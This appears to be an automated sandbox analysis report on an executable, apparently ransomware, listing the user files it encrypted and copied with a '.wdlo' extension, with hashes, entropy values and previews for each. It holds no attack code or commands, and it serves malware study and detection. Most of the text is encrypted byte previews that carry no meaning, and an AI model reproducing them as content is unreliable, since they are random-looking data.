                  Preview:AQRFET:.r...7|.,.{...@.[.Z,.g...4ai...p....,..../vnS..$JT.*J4../..e..<&......E.(..D.2.X..")....8Hf?yL.....HOm.r.G...`j..\..K......n..xu.X=....8.....{....9........I.W...AG./.T22S....A{.....nQ.0.[.w..;jO...~.w3P..m...5.-,.p.........u?.b.v.._/.v;.].>.E...:.M].......Ya.....;..../e..qX*..(u.1.6.J.!c..f;k...{.JM/...[..S..s..`........n...?.a.k.f.......#..g..1S....Z.2M.hg.-h...H.8+.V.9..[.B......let....j.z(....w........"Hu.....T.j..x..{FTQ..........m.......D\...}n.)/8...9.... '..!"7mT_..$..l H.._.;..!.&-.y.g@).E..Uz.a.+.j.s.\.n.zQ..U'....o.Eh<.U.'7`.O..e....d.i.{.F...,.....$.WG....*....yP1I.....0...Wkrj..29~..MGV.....;.~..5\I.].cc....v..F.C{..Y.CQ...H..&.6._B}jv.....xI.._R..&.m..X.. .r$..U...5...5.=~J.^...3BH.=.q...D=.%..p ....1...l..|..-0........x(.V33...%..[.?.'Hn..>_...l.:0._....4jv....>.V..)..2.{.n.p.S......".<..].\................M80..H5.Y*.H....G...2jy.......$/h`.V.vLI.....*.?(..P\..:.M.Q`S..1>Oe..g.Z....$.^.w..wc...>../ne8..;....

                  C:\Users\user\Desktop\GLTYDMDUST\AQRFEVRTGL.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.856942498158761
                  Encrypted:false
                  SSDEEP:24:V6ZKfpsjZ9Ps+6VIG114WhtYi3jYPofP8lJJdHc/Vm2tM8LCyOvoCRSMSb3TIY9T:V6ZKKA+AZhtvU2uvd4Y2tM8LCyOZMzbr
                  MD5:63AC2E1D64869A8EDC398125F1BD5657
                  SHA1:8228CC8A036A229F25C8E5FADF5C26E7EEDEF9B9
                  SHA-256:49317FCDFB6DC68FBAC7EA7E0AB84D7EE5358F48C393A178241BC61B7E6735EF
                  SHA-512:FE2DDC03D42E256DB9FEE7A79B5DC3ED82D178ED61BEC32F866A80A8081E2EFFAAF0D68A7E76881351891FBC57E0A38A2BF2D3CF46F0709DE98959D9A3F3A380
                  Malicious:false
                  Preview:AQRFET:.r...7|.,.{...@.[.Z,.g...4ai...p....,..../vnS..$JT.*J4../..e..<&......E.(..D.2.X..")....8Hf?yL.....HOm.r.G...`j..\..K......n..xu.X=....8.....{....9........I.W...AG./.T22S....A{.....nQ.0.[.w..;jO...~.w3P..m...5.-,.p.........u?.b.v.._/.v;.].>.E...:.M].......Ya.....;..../e..qX*..(u.1.6.J.!c..f;k...{.JM/...[..S..s..`........n...?.a.k.f.......#..g..1S....Z.2M.hg.-h...H.8+.V.9..[.B......let....j.z(....w........"Hu.....T.j..x..{FTQ..........m.......D\...}n.)/8...9.... '..!"7mT_..$..l H.._.;..!.&-.y.g@).E..Uz.a.+.j.s.\.n.zQ..U'....o.Eh<.U.'7`.O..e....d.i.{.F...,.....$.WG....*....yP1I.....0...Wkrj..29~..MGV.....;.~..5\I.].cc....v..F.C{..Y.CQ...H..&.6._B}jv.....xI.._R..&.m..X.. .r$..U...5...5.=~J.^...3BH.=.q...D=.%..p ....1...l..|..-0........x(.V33...%..[.?.'Hn..>_...l.:0._....4jv....>.V..)..2.{.n.p.S......".<..].\................M80..H5.Y*.H....G...2jy.......$/h`.V.vLI.....*.?(..P\..:.M.Q`S..1>Oe..g.Z....$.^.w..wc...>../ne8..;....

                  C:\Users\user\Desktop\GLTYDMDUST\GLTYDMDUST.docx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.850340283732617
                  Encrypted:false
                  SSDEEP:24:6z55oetjEBBlkJvuNz9+N5cvPC6bZQYUAXE0PONpJfRVEj7T3zbD:6F5j5EBbkFlcn7bDINfRc7T3nD
                  MD5:18028247E340C03B3107FBB8F07460C2
                  SHA1:A59EA7728F7D841132E191F8CBE378A9344B7405
                  SHA-256:1D135CEFDFE737BA306FE4866466AB93D59FE8B3E949873B4A879BFB718B7DDC
                  SHA-512:DA760195B1C700D418C61EFB95DAC9EEAF8EB0A64A6493822198BA7B87A3BF9740C6CCC9ED5A579DFCED33B49D439DE7F61283B8B8B14A0C8963821429E0E21E
                  Malicious:false
                  Preview:GLTYD3,b.]WA`!%<7....z...C.o.|.W....P.c.W._.]}\......[..a.;n.K.Ls....'.3=..v...x._.S.j...qLW[0.;5v@......1J...jU.~..I.8DI........pk...q.o...U.Z.,}.*-2.g#.;CG.[....?..Q......go.....(..E.>.[:..E..6..X#;.......%.HM.I..'.{.W...Q..%...X."6D...`*.7..8.M. .t.6.8.(.Y.T)..6)..{q...&-A.D..59*>K......C.V........-6 .f..X....py1.H/X...O..;I..c."..v_..O$.%^. ..#.m.." K......Kl....K.Yh..cu......u.[.Ef....3..h......j...j...&. ow.G...1.?:...;.%.....]npgu.'#n........rX....T.o..)..$...8..B...P.......r....7.@p.O.`{%...:.z....b.g.Z..I.^~b..)..K.GG...+....5....C5... ...z ..I.Y...lr....0.KV.. K..%HX...&..R.V.]....w...]$.o".....\....^......@..!......Mo.8{...e..K.......?.".c9.;..[.....A...U".~..7.".>......cM.\.. a|8=8..O....u...2..KX.J^.W-...T.:....9.|.r7.......Ei....N..7....Z.jh......|..P+...%..j...1.@.....(5..1l.a"Iu.m...y...?..#.im.X....--...D...G....I%.Dl...Af.......Nt&.....1&z.)Va/.,-.3.....l.Z.a.xM.&....%Df..z...P&.pW..?.o.swS.A.\..... X.....X...K...@

                  C:\Users\user\Desktop\GLTYDMDUST\GLTYDMDUST.docx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.850340283732617
                  Encrypted:false
                  SSDEEP:24:6z55oetjEBBlkJvuNz9+N5cvPC6bZQYUAXE0PONpJfRVEj7T3zbD:6F5j5EBbkFlcn7bDINfRc7T3nD
                  MD5:18028247E340C03B3107FBB8F07460C2
                  SHA1:A59EA7728F7D841132E191F8CBE378A9344B7405
                  SHA-256:1D135CEFDFE737BA306FE4866466AB93D59FE8B3E949873B4A879BFB718B7DDC
                  SHA-512:DA760195B1C700D418C61EFB95DAC9EEAF8EB0A64A6493822198BA7B87A3BF9740C6CCC9ED5A579DFCED33B49D439DE7F61283B8B8B14A0C8963821429E0E21E
                  Malicious:false
                  Preview:GLTYD3,b.]WA`!%<7....z...C.o.|.W....P.c.W._.]}\......[..a.;n.K.Ls....'.3=..v...x._.S.j...qLW[0.;5v@......1J...jU.~..I.8DI........pk...q.o...U.Z.,}.*-2.g#.;CG.[....?..Q......go.....(..E.>.[:..E..6..X#;.......%.HM.I..'.{.W...Q..%...X."6D...`*.7..8.M. .t.6.8.(.Y.T)..6)..{q...&-A.D..59*>K......C.V........-6 .f..X....py1.H/X...O..;I..c."..v_..O$.%^. ..#.m.." K......Kl....K.Yh..cu......u.[.Ef....3..h......j...j...&. ow.G...1.?:...;.%.....]npgu.'#n........rX....T.o..)..$...8..B...P.......r....7.@p.O.`{%...:.z....b.g.Z..I.^~b..)..K.GG...+....5....C5... ...z ..I.Y...lr....0.KV.. K..%HX...&..R.V.]....w...]$.o".....\....^......@..!......Mo.8{...e..K.......?.".c9.;..[.....A...U".~..7.".>......cM.\.. a|8=8..O....u...2..KX.J^.W-...T.:....9.|.r7.......Ei....N..7....Z.jh......|..P+...%..j...1.@.....(5..1l.a"Iu.m...y...?..#.im.X....--...D...G....I%.Dl...Af.......Nt&.....1&z.)Va/.,-.3.....l.Z.a.xM.&....%Df..z...P&.pW..?.o.swS.A.\..... X.....X...K...@

                  C:\Users\user\Desktop\GLTYDMDUST\HMPPSXQPQV.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.837827835321853
                  Encrypted:false
                  SSDEEP:24:POMAkEtgkBUU6QMrQSOHD2v5/MgqUdx3U0MWoGJEbH+iKYMFQihuUq/WBvmRs3zX:VALiGU1rQzHD2vdlNUHWZJESDQkq/WLT
                  MD5:C0C6EC9A980DEF97D77D6BB10434A9B7
                  SHA1:1A90A2DFD03D21354A9370C26DA85969012C2351
                  SHA-256:8492BF59B295DDD6E27126DA87813E10DC8DDA4AC6E0747F1E6AE72BDC48DCCB
                  SHA-512:0E926B0A85E3B91C26BC0DBDE1873373ECD8FD3D237EE957D5360399EAB3CE9FF534ADF91812C9ADDE0F28BCE145E587BB801ABB3FE42B0101CD34684A04166B
                  Malicious:false
                  Preview:HMPPSMXa..2...F...aG`.|.].....8..p.........5..Qk....x.3...ie...}.v.+.v4......u.."..K...=."....n.lKE..O..q.....|.P....z.L....h$t.....p..j..rip......8.=..Q.o..my.7&.kb.T>.+...>q.j ..}.7U..s.).J.58Q...Y...!H.Q.>T,.5..CGK....&81......b<..H...)....s{T..D%./....v.5.._.S#a%....j)..d....N.|T...%.....O........&.^&.[o?[..}......5..+Y.B]..s.......=....;.L.5..@.V.....b..^....G...VQ.L....,.,.O.2Oo%..!.~...K....AU....@.u .o....2..&.M..AH3 .......c..;.xS..|.....)..0.T......Y...1.lS...e..*.... ..D..t,....'N'6..m..~e.j.(.D...@..E.p.%~..w..V.&r.M.9..{.B..v:.1<|B.P.X.....u,Vn.....9...=.|.-C{`C..EO..._...X"E>...kx..{..1..6.C.1x...D......pW...y....c.b.....c.6I ..n..N.WFG...<..x.)^.~.f9;.e6...W.P..c`...i.3.......v.......gv.l./...s&.j`.x.k3.ZZ..._.v...hhK...........5.....7t.1Z.z5.J..."\.K 6q_e..0...w.Wn...#...M.#....-.Z..S..9..M.q.XBAK.m...N.......)6..".H<[..a.Vhz.7N...W8{.].>.ws7.m...e.s(.&..p.gkU..xt..v.Rf.c.$Kh0.y.)`.z...4.'.<C...s..p...k.A..}..jHQ^...O.a6.=

                  C:\Users\user\Desktop\GLTYDMDUST\HMPPSXQPQV.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.837827835321853
                  Encrypted:false
                  SSDEEP:24:POMAkEtgkBUU6QMrQSOHD2v5/MgqUdx3U0MWoGJEbH+iKYMFQihuUq/WBvmRs3zX:VALiGU1rQzHD2vdlNUHWZJESDQkq/WLT
                  MD5:C0C6EC9A980DEF97D77D6BB10434A9B7
                  SHA1:1A90A2DFD03D21354A9370C26DA85969012C2351
                  SHA-256:8492BF59B295DDD6E27126DA87813E10DC8DDA4AC6E0747F1E6AE72BDC48DCCB
                  SHA-512:0E926B0A85E3B91C26BC0DBDE1873373ECD8FD3D237EE957D5360399EAB3CE9FF534ADF91812C9ADDE0F28BCE145E587BB801ABB3FE42B0101CD34684A04166B
                  Malicious:false
                  Preview:HMPPSMXa..2...F...aG`.|.].....8..p.........5..Qk....x.3...ie...}.v.+.v4......u.."..K...=."....n.lKE..O..q.....|.P....z.L....h$t.....p..j..rip......8.=..Q.o..my.7&.kb.T>.+...>q.j ..}.7U..s.).J.58Q...Y...!H.Q.>T,.5..CGK....&81......b<..H...)....s{T..D%./....v.5.._.S#a%....j)..d....N.|T...%.....O........&.^&.[o?[..}......5..+Y.B]..s.......=....;.L.5..@.V.....b..^....G...VQ.L....,.,.O.2Oo%..!.~...K....AU....@.u .o....2..&.M..AH3 .......c..;.xS..|.....)..0.T......Y...1.lS...e..*.... ..D..t,....'N'6..m..~e.j.(.D...@..E.p.%~..w..V.&r.M.9..{.B..v:.1<|B.P.X.....u,Vn.....9...=.|.-C{`C..EO..._...X"E>...kx..{..1..6.C.1x...D......pW...y....c.b.....c.6I ..n..N.WFG...<..x.)^.~.f9;.e6...W.P..c`...i.3.......v.......gv.l./...s&.j`.x.k3.ZZ..._.v...hhK...........5.....7t.1Z.z5.J..."\.K 6q_e..0...w.Wn...#...M.#....-.Z..S..9..M.q.XBAK.m...N.......)6..".H<[..a.Vhz.7N...W8{.].>.ws7.m...e.s(.&..p.gkU..xt..v.Rf.c.$Kh0.y.)`.z...4.'.<C...s..p...k.A..}..jHQ^...O.a6.=

                  C:\Users\user\Desktop\GLTYDMDUST\LFOPODGVOH.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.859022199190914
                  Encrypted:false
                  SSDEEP:24:2mAFuKhCNf4ftFF+dSsWfQzWYr/9654WWNMyHOY3zbD:2m0+NoFF+d7WfSYFgMyHz3nD
                  MD5:FE44028126DD33205D1712CE69DD3AD8
                  SHA1:8172B061128B6D27D726CA9D1645843467C175B3
                  SHA-256:AF7C1DFFEE2023C98CB8897FDCA03143321C38D1BA0008CC334298D54BA3F155
                  SHA-512:C3BE8B41171017EFD75EDC6C3C264D7B29A61E719B506935F42017C7A0D7ADBB3305BF492D243FECA63F8B579AEE861F081ED0A09E74079F1BD1D5C6A61A0C36
                  Malicious:false
                  Preview:LFOPOJ.......:...G....CC..Hz#d9;.x.g...0+....JL.{D...).1zW.1..N.k.../5......e./...]...v.F.../....YzP.tn.pLrD:.o..XZ...}Sg5.FS.!C.....?.G;..u<Y../nO..k..v.?....)......-.8..h...$.....H.`#.U...5..o...<Z.L.....C....v...BW..r....;N.....3.A,.A\.3.u..M.eD.'........pp.F..f....n..f.|B..j.{'.:#...0.......0@.&.oz..........E.H..g`..V.K...U.k...7..a.*.....!. .x....Pp..,.k.*N.N...;..A..S. ....i;R..U.b.m.......Zj..gA.l.:.1Is.&$U...]....\>V..x7h.i....<...c...V.n..`...d..YWf..t.g.h.@.S....z>.......5*..\....Bc..a..H......1.#...Iy.."s....F.xf.....p..p..|.g7`........p.#.].M.+U.F...... ...7.. .....^D,|...gG.{.o...........0Op....A.[.O..Q.|f.>...k..||..V..u.87.....Sr(j..*.3....._....[Z...^x.u..F%..T:.9.d ...@K...+d.....t$..}..b*.]..d...9...L....g.....8.._:G.-..~#).x..0-}v...j....u..h.....aL..e\.i..eS..L`.Sf.._.b.,.UH.s.........L...Z...3F|..8@.{.$5.../.V.Wl%e.. 9-8.3..@..;.&...* ..Z......XA.....%.a..&...hu..[.+....7.R......I...+...9.j@X6.A......

                  C:\Users\user\Desktop\GLTYDMDUST\LFOPODGVOH.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.859022199190914
                  Encrypted:false
                  SSDEEP:24:2mAFuKhCNf4ftFF+dSsWfQzWYr/9654WWNMyHOY3zbD:2m0+NoFF+d7WfSYFgMyHz3nD
                  MD5:FE44028126DD33205D1712CE69DD3AD8
                  SHA1:8172B061128B6D27D726CA9D1645843467C175B3
                  SHA-256:AF7C1DFFEE2023C98CB8897FDCA03143321C38D1BA0008CC334298D54BA3F155
                  SHA-512:C3BE8B41171017EFD75EDC6C3C264D7B29A61E719B506935F42017C7A0D7ADBB3305BF492D243FECA63F8B579AEE861F081ED0A09E74079F1BD1D5C6A61A0C36
                  Malicious:false
                  Preview:LFOPOJ.......:...G....CC..Hz#d9;.x.g...0+....JL.{D...).1zW.1..N.k.../5......e./...]...v.F.../....YzP.tn.pLrD:.o..XZ...}Sg5.FS.!C.....?.G;..u<Y../nO..k..v.?....)......-.8..h...$.....H.`#.U...5..o...<Z.L.....C....v...BW..r....;N.....3.A,.A\.3.u..M.eD.'........pp.F..f....n..f.|B..j.{'.:#...0.......0@.&.oz..........E.H..g`..V.K...U.k...7..a.*.....!. .x....Pp..,.k.*N.N...;..A..S. ....i;R..U.b.m.......Zj..gA.l.:.1Is.&$U...]....\>V..x7h.i....<...c...V.n..`...d..YWf..t.g.h.@.S....z>.......5*..\....Bc..a..H......1.#...Iy.."s....F.xf.....p..p..|.g7`........p.#.].M.+U.F...... ...7.. .....^D,|...gG.{.o...........0Op....A.[.O..Q.|f.>...k..||..V..u.87.....Sr(j..*.3....._....[Z...^x.u..F%..T:.9.d ...@K...+d.....t$..}..b*.]..d...9...L....g.....8.._:G.-..~#).x..0-}v...j....u..h.....aL..e\.i..eS..L`.Sf.._.b.,.UH.s.........L...Z...3F|..8@.{.$5.../.V.Wl%e.. 9-8.3..@..;.&...* ..Z......XA.....%.a..&...hu..[.+....7.R......I...+...9.j@X6.A......

                  C:\Users\user\Desktop\GLTYDMDUST\LIJDSFKJZG.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.863944580703869
                  Encrypted:false
                  SSDEEP:24://kKXhXNLzksggiIhrJT8kACZ4a7mHufcY2578S2SNbtejC0u1K2u5snXpQn3PCN:nkKRXNXiIdJTTACr70ufD2id+btej9Jq
                  MD5:83F083D3672ABC0DFD747895B870D4B1
                  SHA1:F6281530B9AF6F37E6086DCD96C89C892E90A7D9
                  SHA-256:7809BF42A7685BF15BE771019364D3CF7FB3ACB246103F4D37D8F17C90562165
                  SHA-512:4EEA0C6D3F3DCD525D58031DDE73D30837C65C871CE94EF86DCC2E1D3CCA15C21B1D595091C38FBFBE0BC9F70E6E163DCC35041B1EA913A70541C4AD6463767A
                  Malicious:false
                  Preview:LIJDS.6+P..F.._..^4...!"..3.....N...Lx.Y.'........\......i..e......M`.4.^.OQ.O..@.....kI..Y@y.Q0.Q:f.@j....V.........l..Sqt.@7..9W.....>.c. ....R.ucUH.qY.Z%.6WT...q&Sa.BeS..2..cP.....B?..g.D....p\.|5...vY.c......Nc.........!...hJ'...c...r.|3..C...2...M.BA.*.....cX.@P.rgD2.o.Y..{T...8...~..r.Z.b....:r'........@..3]..E...}..,.&......)......ON..y...D$4hX.....m..5.1.y..p..C8K./....!]..p-.6....&.)bD.VN2..~/.K&.....-...R.3vZ6.....`7..N..v^.0kL...zK..M.P...%..X|.......Z.^...i....'.hH!.y%BX_.0.....}!w ...)#....t.._..P.=.tq.....5.>.....^.[....~.b.Y.-p.&.Y...xj.#.=..-..8iU@.^Ubt.."Lm..m.I..7.;*....\.......].....!....?..yn&..@.8.=.N}.......|*.).....Ee..DA.....G.X2.7...Q....%..w.....\+vI.{.....*c....sM..m.....`qyn&oK..b].=._`L...+W.......kM:.G..H0..q.b..L5.H...\T..G.0..`.....B....^.... '.....O..~%4....S.}..:.w%.rU.......FB....3......M8....&a.......(..`.C..G......|...{.J..d....l....7...,BB..T>@#..N....kw....:...x+.P..Hfun....4..."..ek#.yRs..B..Y...u.$.@^Ze......F{

                  C:\Users\user\Desktop\GLTYDMDUST\LIJDSFKJZG.jpg.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.863944580703869
                  Encrypted:false
                  SSDEEP:24://kKXhXNLzksggiIhrJT8kACZ4a7mHufcY2578S2SNbtejC0u1K2u5snXpQn3PCN:nkKRXNXiIdJTTACr70ufD2id+btej9Jq
                  MD5:83F083D3672ABC0DFD747895B870D4B1
                  SHA1:F6281530B9AF6F37E6086DCD96C89C892E90A7D9
                  SHA-256:7809BF42A7685BF15BE771019364D3CF7FB3ACB246103F4D37D8F17C90562165
                  SHA-512:4EEA0C6D3F3DCD525D58031DDE73D30837C65C871CE94EF86DCC2E1D3CCA15C21B1D595091C38FBFBE0BC9F70E6E163DCC35041B1EA913A70541C4AD6463767A
                  Malicious:false
                  Preview:LIJDS.6+P..F.._..^4...!"..3.....N...Lx.Y.'........\......i..e......M`.4.^.OQ.O..@.....kI..Y@y.Q0.Q:f.@j....V.........l..Sqt.@7..9W.....>.c. ....R.ucUH.qY.Z%.6WT...q&Sa.BeS..2..cP.....B?..g.D....p\.|5...vY.c......Nc.........!...hJ'...c...r.|3..C...2...M.BA.*.....cX.@P.rgD2.o.Y..{T...8...~..r.Z.b....:r'........@..3]..E...}..,.&......)......ON..y...D$4hX.....m..5.1.y..p..C8K./....!]..p-.6....&.)bD.VN2..~/.K&.....-...R.3vZ6.....`7..N..v^.0kL...zK..M.P...%..X|.......Z.^...i....'.hH!.y%BX_.0.....}!w ...)#....t.._..P.=.tq.....5.>.....^.[....~.b.Y.-p.&.Y...xj.#.=..-..8iU@.^Ubt.."Lm..m.I..7.;*....\.......].....!....?..yn&..@.8.=.N}.......|*.).....Ee..DA.....G.X2.7...Q....%..w.....\+vI.{.....*c....sM..m.....`qyn&oK..b].=._`L...+W.......kM:.G..H0..q.b..L5.H...\T..G.0..`.....B....^.... '.....O..~%4....S.}..:.w%.rU.......FB....3......M8....&a.......(..`.C..G......|...{.J..d....l....7...,BB..T>@#..N....kw....:...x+.P..Hfun....4..."..ek#.yRs..B..Y...u.$.@^Ze......F{

                  C:\Users\user\Desktop\GLTYDMDUST\UNKRLCVOHV.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.844307934779705
                  Encrypted:false
                  SSDEEP:24:kZK9Uc+8ZGw8Sd66OyGTAEDtAVhHQfGnqdR7iTC73zbD:WI48ZTd6AGTAfIGnqdRo43nD
                  MD5:677CF8B3755EF4C19919DC799B079A89
                  SHA1:B49717BDF9B9E3D9A529EE89BABCD17761DA8C95
                  SHA-256:8D780117627DE599765CF0F6181E7AD0FEC4BCBE2BDA73E039668A4AA72C2F70
                  SHA-512:428BE47EC7CCD07A01D882C78BD232EAD53A5465840CC79E199349806B2F43FC4E50973856C8DA8B387BBA7A2F8ED9CCF6E2A3D03A7FBFBBA6B123652FE852A8
                  Malicious:false
                  Preview:UNKRL...l...x..x..Z......z.u.#.......M`K;='%...9.......Y..b+*.+N.....E.......{.m.`..[...X..Z.?~...q.>..aF.Qfh`.a.Y.g..Ewr\v..}'..8.%~L...Rh...PD....F.].....g.4..c(.$_&.O..o..)PR.'.@...9d...1n.1,]..Mf.(O.X.*]..<p_..z...M..A~5.r..m9.....@...X..rN....v.qG.Yp..5......+qJ..?...H|.Y...=L..4.!....1<..E.z.hi7).......\.w....s...TH....l.....t.v%......~........g.o.e./FZ;......nPB.C......g .(.Y_....>5)....C.asp.....I(.."....)M.8..O..5.e....#..].Y..^...(.8......-.HCY9.[:.&).k}.......Wr.Ww..+..[..v..5(.a..........;U>.x.{.5`..=..=.R.{q.Y*......?.C8...O....F?r.`S3bU;..}..!U.e...C.(.|R.-&...i.2U..4.>\.I.e..n..\@....M'..#.#n......+..R.p.c..jo..G._%.M.K%r`A6.V3[...8...5.J+40..j...a.S.u@...8..)M.Tc9W..8.k.=~a....d...c..:w..NP.oC.>...M....>W.y=.\xOQ+N.:]eX.......:[<...C6....(.\.5f. +Ui.$...W..iC.......p...,W..F{.C(..ij#.........Ku..O..u.q......|..&r+[....c...........R\..+.u.W.^L..H.%&.m\...........(.e.....>./...G..A..)m.A......_+...I.u.........Y'.6..

                  C:\Users\user\Desktop\GLTYDMDUST\UNKRLCVOHV.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.844307934779705
                  Encrypted:false
                  SSDEEP:24:kZK9Uc+8ZGw8Sd66OyGTAEDtAVhHQfGnqdR7iTC73zbD:WI48ZTd6AGTAfIGnqdRo43nD
                  MD5:677CF8B3755EF4C19919DC799B079A89
                  SHA1:B49717BDF9B9E3D9A529EE89BABCD17761DA8C95
                  SHA-256:8D780117627DE599765CF0F6181E7AD0FEC4BCBE2BDA73E039668A4AA72C2F70
                  SHA-512:428BE47EC7CCD07A01D882C78BD232EAD53A5465840CC79E199349806B2F43FC4E50973856C8DA8B387BBA7A2F8ED9CCF6E2A3D03A7FBFBBA6B123652FE852A8
                  Malicious:false
                  Preview:UNKRL...l...x..x..Z......z.u.#.......M`K;='%...9.......Y..b+*.+N.....E.......{.m.`..[...X..Z.?~...q.>..aF.Qfh`.a.Y.g..Ewr\v..}'..8.%~L...Rh...PD....F.].....g.4..c(.$_&.O..o..)PR.'.@...9d...1n.1,]..Mf.(O.X.*]..<p_..z...M..A~5.r..m9.....@...X..rN....v.qG.Yp..5......+qJ..?...H|.Y...=L..4.!....1<..E.z.hi7).......\.w....s...TH....l.....t.v%......~........g.o.e./FZ;......nPB.C......g .(.Y_....>5)....C.asp.....I(.."....)M.8..O..5.e....#..].Y..^...(.8......-.HCY9.[:.&).k}.......Wr.Ww..+..[..v..5(.a..........;U>.x.{.5`..=..=.R.{q.Y*......?.C8...O....F?r.`S3bU;..}..!U.e...C.(.|R.-&...i.2U..4.>\.I.e..n..\@....M'..#.#n......+..R.p.c..jo..G._%.M.K%r`A6.V3[...8...5.J+40..j...a.S.u@...8..)M.Tc9W..8.k.=~a....d...c..:w..NP.oC.>...M....>W.y=.\xOQ+N.:]eX.......:[<...C6....(.\.5f. +Ui.$...W..iC.......p...,W..F{.C(..ij#.........Ku..O..u.q......|..&r+[....c...........R\..+.u.W.^L..H.%&.m\...........(.e.....>./...G..A..)m.A......_+...I.u.........Y'.6..

                  C:\Users\user\Desktop\HMPPSXQPQV.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8366435092454845
                  Encrypted:false
                  SSDEEP:24:eyKulAWZqn1pQvSRbrcFCf8bSN6quDE6/lUaqNE1Ienvf6yqOwleuFuP/lSC3zbD:enO6QvSVkC/6/qo15nZ1MUSC3nD
                  MD5:B153297183048612B00227DFED82BB89
                  SHA1:E7D159E0F9EA8CDB7E0AFA692E81DA121C85BD6E
                  SHA-256:241A7BC62C0D9BCA5C9B244F873DA75BF893AC0956D64E27C1DE705667D07F25
                  SHA-512:4CD82D132F2D4DFA13EC7723D939DDAFD3AF3DAA349B130080FE93A7951F839B8791C788E8686D9BB5B3B2FA24A03E64AB93F41805D55DD2D287B022964096EA
                  Malicious:false
                  Preview:HMPPS.&.=.U'F.+W.N{.@...7.....caC..s.z-b.~.....9.[1.:H.lrX7~~...r... $3.R8.X).$&.].Z.>0..........?gR....)..w*PYa'yR>'.......F......['..j...3*..JF.J%...b.`.......>aF..y<^}......../..yD.......n........P.ri.]..9.V.|3.............+.-.(.P.7..`.Y..K..N..).@...s...a.........I......{...?......,...DhY....h.Y.iS-Xr0=;5.....Jo.3:.hWS.<...=.^.b.2)..T<&.....n..t....w..hF.#.<.5.98..s....m...5.X...X.A@...e..../.gS.';O..n..?r.}w....#......:..Gx...0...=......a.R....../..E3.=}6....A|8.R.Z.K..}\..].!V..m~g..!..V.f....2...9.!(..I<..3...z...#.a.U6L.....KjZf[<.$...$......}...A.i.<Z.1...=P....Z......>..`....b....^b....w\?.L+..Yr..C3,.e....mF.D..a.7.~.Ah......D.*r..f.!)....lV=_...L.i...*K.~..zC%A.:.Qh.g...O|.((.f...|...cX_.x..L;i..t6..o.....'0....mI.....N.;Ng.v2.JBz$~=s....+_...F...4<...dX..:.a$.KAC...[.ueq.|:5Q...z.@G:z.?.s.........j-.S...0.<a/Lk.....g.r...|=;...M...{.vH+r....EA<'d8B.n.3bI8$....LO..F...p.......!...y5. 1.$u..u.#..&..z..."C....[....D....z.F../.....Ai.

                  C:\Users\user\Desktop\HMPPSXQPQV.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8366435092454845
                  Encrypted:false
                  SSDEEP:24:eyKulAWZqn1pQvSRbrcFCf8bSN6quDE6/lUaqNE1Ienvf6yqOwleuFuP/lSC3zbD:enO6QvSVkC/6/qo15nZ1MUSC3nD
                  MD5:B153297183048612B00227DFED82BB89
                  SHA1:E7D159E0F9EA8CDB7E0AFA692E81DA121C85BD6E
                  SHA-256:241A7BC62C0D9BCA5C9B244F873DA75BF893AC0956D64E27C1DE705667D07F25
                  SHA-512:4CD82D132F2D4DFA13EC7723D939DDAFD3AF3DAA349B130080FE93A7951F839B8791C788E8686D9BB5B3B2FA24A03E64AB93F41805D55DD2D287B022964096EA
                  Malicious:false
